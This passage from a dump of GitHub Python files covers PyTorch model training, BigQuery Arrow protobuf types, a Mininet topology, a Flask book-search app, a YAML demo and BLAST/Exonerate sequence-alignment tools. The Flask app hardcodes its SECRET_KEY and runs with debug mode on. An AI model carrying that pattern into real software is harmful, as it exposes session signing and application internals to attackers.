nn.Linear(1024, 256)\n# self.fc3 = nn.Linear(256, 2)\n#\n# def forward(self, image):\n# \"\"\"Compute a forward pass.\"\"\"\n# first_conv_features = self.pool(F.relu(self.conv1(image)))\n# second_conv_features = self.pool(F.relu(self.conv2(\n# first_conv_features)))\n# third_conv_features = self.pool(F.relu(self.conv3(\n# second_conv_features)))\n# # flatten all dimensions except batch\n# flattened_features = torch.flatten(third_conv_features, 1)\n# fully_connected_first_out = F.relu(self.fc1(flattened_features))\n# fully_connected_second_out = F.relu(self.fc2(fully_connected_first_out))\n# two_way_output = self.fc3(fully_connected_second_out)\n# return two_way_output\n#\n# Arguments\ndef parse_args():\n \"\"\"Parse script arguments.\n\n Get training 
hyper-parameters such as: learning rate, momentum,\n batch size, number of training epochs and optimizer.\n Get training dataset and the model name.\n \"\"\"\n parser = argparse.ArgumentParser(description='Training models with Pytorch')\n parser.add_argument('--lr', default=0.001, type=float,\n help='learning rate')\n parser.add_argument('--momentum', default=0.9, type=float,\n help='SGD momentum')\n parser.add_argument('--batch_size', '-b', default=32, type=int,\n help='Training batch size')\n parser.add_argument('--epochs', '-e', default=4, type=int,\n help='Number of epochs to run')\n parser.add_argument('--optimizer', '-o', default='Adam', type=str,\n help='Optimization Algorithm')\n parser.add_argument('--dataset', '-d',\n default='fakes_dataset', type=str,\n help='Dataset: fakes_dataset or synthetic_dataset.')\n\n return parser.parse_args()\n\ndef train_my_competition_model():\n args = parse_args()\n # Data\n print(f'==> Preparing data: {args.dataset.replace(\"_\", \" \")}..')\n\n train_dataset = load_dataset(dataset_name=args.dataset,\n dataset_part='train')\n val_dataset = load_dataset(dataset_name=args.dataset, dataset_part='val')\n test_dataset = load_dataset(dataset_name=args.dataset, dataset_part='test')\n\n # Model\n model = get_xception_based_model()\n\n # Loss\n criterion = nn.CrossEntropyLoss()\n\n # Build optimizer\n optimizers = {\n 'SGD': lambda: optim.SGD(model.parameters(),\n lr=args.lr,\n momentum=args.momentum),\n 'Adam': lambda: optim.Adam(model.parameters(), lr=args.lr),\n }\n\n optimizer_name = args.optimizer\n if optimizer_name not in optimizers:\n raise ValueError(f'Invalid Optimizer name: {optimizer_name}')\n print(f\"Building optimizer {optimizer_name}...\")\n optimizer = optimizers[args.optimizer]()\n print(optimizer)\n\n optimizer_params = optimizer.param_groups[0].copy()\n # remove the parameter values from the optimizer parameters for a cleaner\n # log\n del optimizer_params['params']\n\n # Batch size\n batch_size = args.batch_size\n\n # Training Logging Parameters\n logging_parameters = LoggingParameters(model_name='myNet',\n dataset_name=args.dataset,\n optimizer_name=optimizer_name,\n optimizer_params=optimizer_params,)\n\n # Create an abstract trainer to train the model with the data and parameters\n # above:\n trainer = Trainer(model=model,\n optimizer=optimizer,\n criterion=criterion,\n batch_size=batch_size,\n train_dataset=train_dataset,\n validation_dataset=val_dataset,\n test_dataset=test_dataset)\n # Train, evaluate and test the model:\n trainer.run(epochs=args.epochs, logging_parameters=logging_parameters)\n\n\ndef my_competition_model():\n \"\"\"Override the model initialization here.\n\n Do not change the model load line.\n \"\"\"\n # initialize your model:\n model = get_xception_based_model()\n\n\n # load your model using exactly this line (don't change it):\n model.load_state_dict(torch.load('checkpoints/competition.pt')['model'])\n return model\n\nif __name__==\"__main__\":\n train_my_competition_model()\n\n","repo_name":"Moshey99/AuthenticImageDetection","sub_path":"competition_model.py","file_name":"competition_model.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"970365753","text":"from __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nimport proto # type: ignore\n\n\n__protobuf__ = proto.module(\n package=\"google.cloud.bigquery.storage.v1beta2\",\n manifest={\n \"ArrowSchema\",\n 
\"ArrowRecordBatch\",\n \"ArrowSerializationOptions\",\n },\n)\n\n\nclass ArrowSchema(proto.Message):\n r\"\"\"Arrow schema as specified in\n https://arrow.apache.org/docs/python/api/datatypes.html and\n serialized to bytes using IPC:\n\n https://arrow.apache.org/docs/format/Columnar.html#serialization-and-interprocess-communication-ipc\n\n See code samples on how this message can be deserialized.\n\n Attributes:\n serialized_schema (bytes):\n IPC serialized Arrow schema.\n \"\"\"\n\n serialized_schema: bytes = proto.Field(\n proto.BYTES,\n number=1,\n )\n\n\nclass ArrowRecordBatch(proto.Message):\n r\"\"\"Arrow RecordBatch.\n\n Attributes:\n serialized_record_batch (bytes):\n IPC-serialized Arrow RecordBatch.\n \"\"\"\n\n serialized_record_batch: bytes = proto.Field(\n proto.BYTES,\n number=1,\n )\n\n\nclass ArrowSerializationOptions(proto.Message):\n r\"\"\"Contains options specific to Arrow Serialization.\n\n Attributes:\n format_ (google.cloud.bigquery_storage_v1beta2.types.ArrowSerializationOptions.Format):\n The Arrow IPC format to use.\n \"\"\"\n\n class Format(proto.Enum):\n r\"\"\"The IPC format to use when serializing Arrow streams.\n\n Values:\n FORMAT_UNSPECIFIED (0):\n If unspecied the IPC format as of 0.15\n release will be used.\n ARROW_0_14 (1):\n Use the legacy IPC message format as of\n Apache Arrow Release 0.14.\n ARROW_0_15 (2):\n Use the message format as of Apache Arrow\n Release 0.15.\n \"\"\"\n FORMAT_UNSPECIFIED = 0\n ARROW_0_14 = 1\n ARROW_0_15 = 2\n\n format_: Format = proto.Field(\n proto.ENUM,\n number=1,\n enum=Format,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","repo_name":"googleapis/python-bigquery-storage","sub_path":"google/cloud/bigquery_storage_v1beta2/types/arrow.py","file_name":"arrow.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"78"} +{"seq_id":"42361672880","text":"#! 
/usr/bin/python\n# invocare con mn --custom load-balance-topology.py --topo LBTopo\n\nfrom mininet.topo import Topo #definire la topologia\n\n\"\"\"h1 -- s1 -- s3 -- s2 -- h2\n \\ /\n \\ s4 /\n\"\"\"\nclass LBTopo ( Topo ):\n\n def build(self):\n\n #Aggiungo nuovi host\n host1= self.addHost('h1')\n host2= self.addHost('h2')\n\n #Aggiungo nuovi switch\n switch1=self.addSwitch('s1')\n switch2=self.addSwitch('s2')\n switch3=self.addSwitch('s3')\n switch4=self.addSwitch('s4')\n\n #Aggiungo i link agli switch\n #switch1\n self.addLink(switch1,host1,port1=1)\n self.addLink(switch1,switch3,port1=2)\n self.addLink(switch1,switch4,port1=3)\n\n #switch2\n self.addLink(switch2,host2,port1=1)\n self.addLink(switch2,switch3,port1=2)\n self.addLink(switch2,switch4,port1=3)\n\ntopos = { 'LBTopo' : ( lambda: LBTopo() ) }\n","repo_name":"gverticale/sdn-vm-polimi","sub_path":"sdn-lab/altri_esempi/load-balance-topology.py","file_name":"load-balance-topology.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"6279540800","text":"import flask\nimport flask_wtf\nimport flask_bootstrap\nimport form\nimport functions\nimport wtforms\n\napp = flask.Flask(__name__)\napp.config['SECRET_KEY'] = 'yyh970923' # 密钥\nbootstrap = flask_bootstrap.Bootstrap(app)\n\n\n@app.route('/')\ndef main_gui():\n return flask.render_template('MainGui.html')\n\n\n@app.route('/search')\ndef search():\n return flask.render_template('search.html')\n\n\n@app.route('/search_by_title', methods=['GET', 'POST'])\ndef search_by_title():\n form0 = form.NameForm()\n if form0.validate_on_submit(): # 数据不为空\n title = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_title.html', form=form0, data='') # 输入为空\n data = functions.search_by_title(title)\n return flask.render_template('search_by_title.html', form=form0, data=data)\n\n\n@app.route('/search_by_author', methods=['GET', 'POST'])\ndef search_by_author():\n form0 = form.NameForm()\n if form0.validate_on_submit():\n author = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_author.html', form=form0, data='', data_favour='')\n data, data_favour = functions.search_by_author(author)\n return flask.render_template('search_by_author.html', form=form0, data=data, data_favour=data_favour)\n\n\n@app.route('/search_by_type', methods=['GET', 'POST'])\ndef search_by_type():\n form0 = form.NameForm()\n if form0.validate_on_submit():\n thetype = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_type.html', form=form0, data='', data_favour='')\n data, data_favour = functions.search_by_type(thetype)\n return flask.render_template('search_by_type.html', form=form0, data=data, data_favour=data_favour)\n\n\n\"\"\"\n 暂时的解决方案,试图完善通过href得到指定参数并传入表单中\n\"\"\"\n@app.route('/type/')\ndef totype(thetype):\n return thetype\n\n\n@app.route('/update')\ndef update():\n form0 = form.UpdateForm()\n if form0.validate_on_submit():\n data = form0.data\n form0.data = []\n return flask.render_template('update.html', form=form0)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Ronnieyang97/eleclib","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20049978852","text":"\nitems = [\"T-shirt\",\"Sweater\"]\nuser = input(\"Wellcome to our shop, 
what do you want (C,R,U,D)?\\n\")\nif user ==\"R\":\n print(items)\nelif user ==\"C\":\n Newitem1=input(\"Input new item:\\n\")\n items.append(Newitem1)\n print(items)\nelif user ==\"U\":\n Newposition = int(input(\"Upadate position?\\n\"))\n if Newposition <= len(items):\n # items.pop(Newposition - 1) \n Newitem2 = input(\"New item:\\n\")\n items.insert((Newposition - 1), Newitem2)\n else: \n print(\"Error.\")\n print(items)\nelif user ==\"D\":\n Newposition2 = int(input(\"The position you want to delete:\\n\"))\n if Newposition2 <= len(items):\n items.pop(Newposition2 - 1)\n print(items)\n else:\n print(\"Error.\") \n \n","repo_name":"linhptk/phamthikhanhlinh-fundamental-C4E27","sub_path":"Sesion03/HW/Serious excercise 1.py","file_name":"Serious excercise 1.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74100514506","text":"# Create a YAML file with sample data using the pyyaml library.\nimport yaml\n\nprint(\"this is code added in third-branch\")\n# code to read from sample yaml file\n# with open('sample.yaml', 'r') as file:\n# prime_service = yaml.safe_load(file)\n\n# # print(prime_service)\n# print(prime_service['rest']['port'])\nnames_for_yaml = \"\"\"\n- 'eric'\n- 'sita'\n- 'hari'\n\"\"\"\nnames = yaml.safe_load(names_for_yaml)\n\nwith open('names.yaml', 'w') as file:\n yaml.dump(names, file)\n\nprint(open('names.yaml').read())\n","repo_name":"sanjeebnepal/python-git-demo","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34230714950","text":"'''A collection of tools to handle sequence manipulation.\nPart of the biostructmap package.\n'''\nfrom __future__ import absolute_import, division, print_function\n\nfrom io import StringIO\nimport operator\nimport re\nimport subprocess\nimport tempfile\nimport warnings\nfrom Bio import AlignIO\nfrom Bio.Blast.Applications import NcbiblastpCommandline\nfrom Bio.Blast import NCBIXML\nfrom Bio.pairwise2 import align\nfrom Bio.SubsMat import MatrixInfo as matlist\nfrom Bio.Seq import Seq\n\n#Use local BLAST+ installation. Falls back to pairwise2 if False.\nLOCAL_BLAST = True\n#Use local exonerate installation to align dna to protein sequences.\n#Falls back to a basic method using either BLAST+ or pairwise2 if False,\n#but won't take into consideration introns or frameshift mutations.\nLOCAL_EXONERATE = True\n\ndef _sliding_window(seq_align, window, step=3, fasta_out=False):\n '''\n Generate a Multiple Sequence Alignment over a sliding window.\n\n Input is either filehandle, or Bio.AlignIO multiple sequence alignment\n object.\n Args:\n seq_align: A multiple sequence alignment. Either a filehandle, or\n Bio.AlignIO multiple sequence alignment object.\n window (int): Sliding window width\n step (int, optional): Step size to increment each window. Default of 3.\n fasta_out (bool): If True, output will be a fasta formatted string. 
If\n False, then output will be an AlignIO object.\n Yields:\n str/MultipleSequenceAlignment: The next window in the sliding window\n series for the original multiple sequence alignment.\n '''\n try:\n alignments = AlignIO.read(seq_align, 'fasta')\n except (AttributeError, ValueError):\n alignments = seq_align\n #Length of alignments\n length = len(alignments[0])\n for i in range(0, length-window, step):\n alignment = alignments[:, i:i+window]\n if fasta_out:\n alignment = alignment.format('fasta')\n yield alignment\n\ndef _sliding_window_var_sites(seq_align, window, step=3):\n '''\n Generate a Multiple Sequence Alignment over a sliding window, only\n including polymorphic sites in the alignment.\n\n Notes:\n Returns an empty MultipleSequenceAlignment object if no polymorphic\n sites are found within the window.\n\n Args:\n seq_align: A multiple sequence alignment. Either a filehandle, or\n Bio.AlignIO multiple sequence alignment object.\n window (int): Sliding window width\n step (int, optional): Step size to increment each window. Default of 3.\n fasta_out (bool): If True, output will be a fasta formatted string. If\n False, then output will be an AlignIO object.\n Yields:\n MultipleSequenceAlignment: The next window in the sliding window\n series for the original multiple sequence alignment, with\n only polymorphic sites displayed.\n '''\n try:\n alignments = AlignIO.read(seq_align, 'fasta')\n except (AttributeError, ValueError):\n alignments = seq_align\n #Length of alignments\n length = len(alignments[0])\n\n align_dict = _var_site(alignments)\n\n #Create first window\n initial_sites = {key:value for (key, value) in align_dict.items()\n if key < window}\n #Small hack to set type of 'initial_sites' variable if no alignments fall\n #within initial window\n initial_sites[-1] = alignments[:, 0:0]\n\n alignment = _join_alignments(initial_sites)\n yield alignment\n # Add/remove sites from the end/start of window as appropriate.\n for i in range(0, (length-window), step):\n for j in range(step):\n if i + j in align_dict:\n alignment = alignment[:, 1:]\n if i + j + window in align_dict:\n alignment = alignment + align_dict[i+j+window]\n yield alignment\n\n\ndef _var_site(alignment):\n '''\n Take a multiple sequence alignment object and return polymorphic sites in a\n dictionary object.\n\n This function is used to simplify the input to a tajima's D calculation.\n\n Args:\n alignment: A multiple sequence alignment object.\n\n Returns:\n dict: A dictionary containing polymorphic sites (value) accessed by\n position in the alignment (key).\n '''\n result = {}\n for i in range(len(alignment[0])):\n site = alignment[:, i]\n #Check if string contains a single character. 
Most efficient method\n #found so far.\n if site != len(site) * site[0]:\n result[i] = alignment[:, i:i+1]\n return result\n\ndef _join_alignments(align_dict):\n '''\n Take a dictionary of multiple sequence alignments, and join according to\n dictionary key order (generally position in sequence).\n\n Args:\n align_dict (dict): A dictionary containing single-site multiple sequence\n alignment objects accessed by position in original alignment.\n\n Returns:\n MultipleSequenceAlignment: A multiple sequence alignment object\n containing all polymorphic sites.\n '''\n output = None\n for key in sorted(align_dict):\n if not output:\n output = align_dict[key]\n else:\n output = output + align_dict[key]\n return output\n\ndef align_protein_sequences(comp_seq, ref_seq):\n '''\n Perform a pairwise alignment of two sequences.\n\n Uses BLAST+ if LOCAL_BLAST is set to True, otherwise uses Bio.pairwise2.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n if LOCAL_BLAST:\n return blast_sequences(comp_seq, ref_seq)\n else:\n return pairwise_align(comp_seq, ref_seq)\n\n\ndef align_protein_to_dna(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence.\n\n If LOCAL_EXONERATE flag is set to True, takes into consideration\n introns, frameshifts and reverse-sense translation if using Exonerate.\n\n If LOCAL_EXONERATE flag is set to False, then a simple translation and\n pairwise alignment is performed, and does not consider introns, frameshifts\n or reverse-sense translations.\n\n Note:\n This method uses the external program Exonerate:\n http://www.ebi.ac.uk/about/vertebrate-genomics/software/exonerate\n This needs to be installed in the users PATH.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n if LOCAL_EXONERATE:\n return _align_prot_to_dna_exonerate(prot_seq, dna_seq)\n else:\n return _align_prot_to_dna_no_exonerate(prot_seq, dna_seq)\n\n\n\ndef _align_prot_to_dna_no_exonerate(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence. Does not take consider\n introns, frameshifts or reverse-sense translation.\n If these are required, should use Exonerate method instead.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n #Translate DNA sequence to protein sequence\n dna_prot_seq = str(Seq(dna_seq).translate())\n #Use existing methods to align protein-protein\n prot_dna_dict, _ = align_protein_sequences(prot_seq, dna_prot_seq)\n #Convert output to protein: codon dict\n protein_to_codons = {key: (value*3-2, value*3-1, value*3) for\n key, value in prot_dna_dict.items()}\n return protein_to_codons\n\ndef pairwise_align(comp_seq, ref_seq):\n '''\n Perform a pairwise alignment of two sequences.\n\n Uses the BioPython pairwise2 module with the BLOSUM62 matrix for scoring\n similarity. 
Gap opening penalty is -11 and gap extend penalty is -1,\n which is the same as the default blastp parameters.\n\n Output is two dictionaries: residue numbering in PDB chain (key) mapped to\n the residue position in the reference sequence (value), and vice versa.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n alignment = align.globalds(comp_seq, ref_seq, matlist.blosum62, -11, -1,\n penalize_end_gaps=False, one_alignment_only=True)[0]\n query_string = alignment[0]\n sbjct_string = alignment[1]\n #Create dictionary mapping position in PDB chain to position in ref sequence\n pdb_to_ref = {}\n ref_to_pdb = {}\n key = 1\n ref = 1\n for i, res in enumerate(query_string):\n if res.isalpha() and sbjct_string[i].isalpha():\n pdb_to_ref[key] = ref\n ref_to_pdb[ref] = key\n key += 1\n ref += 1\n elif res.isalpha():\n key += 1\n elif sbjct_string[i].isalpha():\n ref += 1\n return pdb_to_ref, ref_to_pdb\n\ndef blast_sequences(comp_seq, ref_seq):\n '''\n Perform BLAST of two protein sequences using NCBI BLAST+ package.\n\n Output is two dictionaries: residue numbering in PDB chain (key) mapped to\n the residue position in the reference sequence (value), and vice versa.\n\n Notes:\n User must have NCBI BLAST+ package installed in user's PATH.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n with tempfile.NamedTemporaryFile(mode='w') as comp_seq_file, \\\n tempfile.NamedTemporaryFile(mode='w') as ref_seq_file:\n comp_seq_file.write(\">\\n\" + str(comp_seq) + \"\\n\")\n ref_seq_file.write(\">\\n\" + str(ref_seq) + \"\\n\")\n ref_seq_file.flush()\n comp_seq_file.flush()\n blastp_cline = NcbiblastpCommandline(query=comp_seq_file.name,\n subject=ref_seq_file.name,\n evalue=0.001, outfmt=5)\n alignment, _stderror = blastp_cline()\n blast_xml = StringIO(alignment)\n blast_record = NCBIXML.read(blast_xml)\n temp_score = 0\n high_scoring_hsp = None\n #Retrieve highest scoring HSP\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n if hsp.score > temp_score:\n temp_score = hsp.score\n high_scoring_hsp = hsp\n #Create dictionary mapping position in PDB chain to position in ref sequence\n pdb_to_ref = {}\n ref_to_pdb = {}\n if high_scoring_hsp is not None:\n query_string = high_scoring_hsp.query\n sbjct_string = high_scoring_hsp.sbjct\n key = high_scoring_hsp.query_start\n ref = high_scoring_hsp.sbjct_start\n for i, res in enumerate(query_string):\n if res.isalpha() and sbjct_string[i].isalpha():\n pdb_to_ref[key] = ref\n ref_to_pdb[ref] = key\n key += 1\n ref += 1\n elif res.isalpha():\n key += 1\n elif sbjct_string[i].isalpha():\n ref += 1\n return pdb_to_ref, ref_to_pdb\n\n\ndef _construct_sub_align_from_chains(alignments, codons, fasta=False):\n '''\n Take a list of biostructmap multiple sequence alignment objects, and\n return a subset of codons based on an input list in the form\n [('A',(1,2,3)),('B',(4,5,6)),...].\n\n Notes:\n Codons should be 1-indexed, not 0-indexed.\n\n Args:\n alignment (dict): A dictionary 
of multiple sequence alignment objects\n accessed by a tuple of chain ids for each alignment.\n codons (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. If the fasta kwarg is set to\n True, returns a string instead.\n '''\n chain_alignments = {}\n chain_strains = {}\n for key, alignment in alignments.items():\n chain_alignments[key] = alignment.get_alignment_position_dict()\n chain_strains[key] = alignment.get_isolate_ids()\n codons = [(chain_id, x) for chain_id, sublist in codons for x in sublist]\n sub_align = []\n for codon in codons:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(chain_alignments[codon[0]][codon[1]-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n strains = list(chain_strains.values())[0]\n if sub_align_transpose:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n else:\n fasta_out = ''.join('>{}\\n\\n'.format(strain) for strain in strains)\n return fasta_out\n return sub_align_transpose\n\ndef _construct_protein_sub_align_from_chains(alignments, residues, fasta=False):\n '''\n Take a list of biostructmap multiple sequence alignment objects, and\n return a subset of residues based on an input list in the form\n [('A', 1), ('B', 4), ...].\n\n Notes:\n Residues should be 1-indexed, not 0-indexed.\n\n Args:\n alignment (dict): A dictionary of multiple sequence alignment objects\n accessed by a tuple of chain ids for each alignment.\n residues (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. If the fasta kwarg is set to\n True, returns a string instead.\n '''\n chain_alignments = {}\n chain_strains = {}\n for key, alignment in alignments.items():\n chain_alignments[key] = alignment.get_alignment_position_dict()\n chain_strains[key] = alignment.get_isolate_ids()\n sub_align = []\n for residue in residues:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(chain_alignments[residue[0]][residue[1]-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n strains = list(chain_strains.values())[0]\n if sub_align_transpose:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n else:\n fasta_out = ''.join('>{}\\n\\n'.format(strain) for strain in strains)\n return fasta_out\n return sub_align_transpose\n\ndef _construct_sub_align(alignment, codons, fasta=False):\n '''\n Take a biostructmap multiple sequence alignment object, and return a\n subset of codons based on an input list in the form [(1,2,3),(4,5,6),...].\n\n Notes:\n Codons should be 1-indexed, not 0-indexed.\n\n Args:\n alignment: A multiple sequence alignment object.\n codons (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. 
If the fasta kwarg is set to\n True, returns a string instead.\n '''\n alignments = alignment.get_alignment_position_dict()\n strains = alignment.get_isolate_ids()\n codons = [x for sublist in codons for x in sublist]\n sub_align = []\n for codon in codons:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(alignments[codon-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n return fasta_out\n return sub_align_transpose\n\ndef check_for_uncertain_bases(alignment):\n '''\n Check for uncertain or missing base pairs in a multiple sequence alignment.\n\n Args:\n alignment (list): A multiple sequence alignment as a list of sequence\n strings.\n Returns:\n bool: True if alignment contains bases other than A, C, G or T.\n '''\n accepted_bases = 'ACGTacgt'\n for sequence in alignment:\n for base in sequence:\n if base not in accepted_bases:\n warnings.warn(\"Multiple sequence alignment contains uncertain \"\\\n \"or missing bases: using DendroPy implementation of population \"\\\n \"statistics, which is slower. Also, DendroPy treatment of uncertain \"\\\n \"bases is not guaranteed to be correct, and it suggested the user filter \"\\\n \"out uncertain bases before running BioStructMap.\")\n return True\n return False\n\ndef _align_prot_to_dna_exonerate(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence. Takes into consideration\n introns, frameshifts and reverse-sense translation.\n\n Note:\n This method uses the external program Exonerate:\n http://www.ebi.ac.uk/about/vertebrate-genomics/software/exonerate\n This needs to be installed in the users PATH.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n #TODO Use Biopython exonerate parser. 
Didn't realise that existed when I wrote this parser.\n with tempfile.NamedTemporaryFile(mode='w') as protein_seq_file, \\\n tempfile.NamedTemporaryFile(mode='w') as dna_seq_file:\n protein_seq_file.write(\">\\n\" + prot_seq + \"\\n\")\n dna_seq_file.write(\">\\n\" + dna_seq + \"\\n\")\n dna_seq_file.flush()\n protein_seq_file.flush()\n #If protein sequence length is small, then exonerate score needs\n #to be adjusted in order to return alignment.\n #With a length n, a perfect match would score 5n.\n #Hence we make a threshold of 3n (60%).\n exonerate_call = [\"exonerate\",\n \"--model\", \"protein2genome\",\n \"--showalignment\", \"False\",\n \"--showvulgar\", \"True\",\n protein_seq_file.name,\n dna_seq_file.name]\n if len(prot_seq) < 25:\n threshold = str(len(prot_seq) * 3)\n exonerate_call.append(\"--score\")\n exonerate_call.append(threshold)\n alignment = subprocess.check_output(exonerate_call)\n vulgar_re = re.search(r\"(?<=vulgar:).*(?=\\n)\",\n alignment.decode(\"utf-8\"))\n if not vulgar_re:\n raise UserWarning(\"Did not find exonerate alignment.\")\n vulgar_format = vulgar_re.group(0)\n protein_start = vulgar_format.split()[0]\n dna_start = vulgar_format.split()[3]\n matches = vulgar_format.split()[7:]\n direction = vulgar_format.split()[5]\n protein_count = int(protein_start)\n dna_count = int(dna_start)\n\n if direction == \"+\":\n step = operator.add\n elif direction == \"-\":\n step = operator.sub\n dna_count += 1\n else:\n raise UserWarning(\"Exonerate direction doesn't match either '+' or '-'\")\n\n if len(matches) % 3:\n raise UserWarning(\"The vulgar output from exonerate has failed \\\n to parse correctly\")\n #Split output into [modifier, query_count, ref_count] triples\n matches = [matches[i*3:i*3+3] for i in range(len(matches)//3)]\n matched_bases = {}\n\n codon = []\n\n #Convert vulgar format to dictionary with residue: codon pairs\n for region in matches:\n modifier = region[0]\n count1 = int(region[1])\n count2 = int(region[2])\n if modifier == 'M':\n if count1 != count2 / 3:\n raise UserWarning(\"Match in vulgar output is possibly \" +\n \"incorrect - number of protein residues \" +\n \"should be the number of bases divided by 3\")\n for _ in range(count2):\n dna_count = step(dna_count, 1)\n codon.append(dna_count)\n if len(codon) == 3:\n protein_count += 1\n matched_bases[protein_count] = tuple(codon)\n codon = []\n if modifier == 'C':\n if count1 != count2 / 3:\n raise UserWarning(\"Codon in vulgar output is possibly \" +\n \"incorrect - number of protein residues \" +\n \"should be the number of bases divided by 3\")\n raise UserWarning(\"Unexpected output in vulgar format - not \" +\n \"expected to need functionality for 'codon' \" +\n \"modifier\")\n if modifier == 'G' or modifier == 'N':\n if codon:\n raise UserWarning(\"Warning - split codon over gap in \" +\n \"exonerate output!\")\n protein_count = protein_count + count1\n dna_count = step(dna_count, count2)\n if modifier == '5' or modifier == '3':\n if count1 != 0:\n raise UserWarning(\"Warning - protein count should be 0 in \" +\n \"exonerate output over intron splice sites.\")\n dna_count = step(dna_count, count2)\n if modifier == 'I':\n if count1 != 0:\n raise UserWarning(\"Warning - protein count should be 0 in \" +\n \"exonerate output over intron.\")\n dna_count = step(dna_count, count2)\n if modifier == 'S':\n for _ in range(count2):\n dna_count = step(dna_count, 1)\n codon.append(dna_count)\n if len(codon) == 3:\n protein_count += 1\n matched_bases[protein_count] = tuple(codon)\n codon = []\n if 
modifier == 'F':\n raise UserWarning(\"Unexpected frameshift in exonerate output - \" +\n \"check alignment input.\")\n\n return matched_bases\n","repo_name":"andrewguy/biostructmap","sub_path":"biostructmap/seqtools.py","file_name":"seqtools.py","file_ext":"py","file_size_in_byte":23316,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"2000326525","text":"\"\"\"\r\ndacc_homework_2.py\r\nauthor: Hiteshi Shah (hss7374)\r\ndate: 9/23/2018\r\n\"\"\"\r\n\r\nimport nltk\r\nimport statistics\r\nimport re\r\nfrom nltk.parse import stanford\r\nimport os\r\n\r\njava_path = \"C:/Program Files/Java/jdk1.8.0_102/bin/java.exe\"\r\nos.environ['JAVAHOME'] = java_path\r\nos.environ['STANFORD_PARSER'] ='C:\\\\Users\\\\hites\\\\Documents\\\\Data Analytics Cognitive Comp\\\\stanford-parser'\r\nos.environ['STANFORD_MODELS'] ='C:\\\\Users\\\\hites\\\\Documents\\\\Data Analytics Cognitive Comp\\\\stanford-parser'\r\n\r\nprefixes = \"(1|www|_a_|A|E|H|L|M|T|W|PGDP|Fig|Figs)[.]\"\r\nverb_tags = ['VB', 'VBD', 'VBN', 'VBP', 'VBZ']\r\n\r\ndef pos_tagging(sentence):\r\n print(\"Tags:\", 